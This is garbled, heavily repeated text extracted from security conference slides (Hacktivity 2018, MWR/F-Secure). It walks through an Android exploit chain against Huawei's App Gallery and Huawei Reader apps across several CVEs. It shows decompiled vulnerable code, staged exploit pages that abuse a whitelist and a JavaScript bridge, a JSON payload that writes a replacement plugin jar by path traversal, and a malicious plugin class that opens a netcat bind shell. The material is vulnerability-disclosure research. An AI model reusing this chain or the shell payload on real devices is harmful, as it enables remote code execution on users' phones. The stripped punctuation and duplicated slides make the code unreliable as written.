appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 26: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 27: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 28: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 29: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

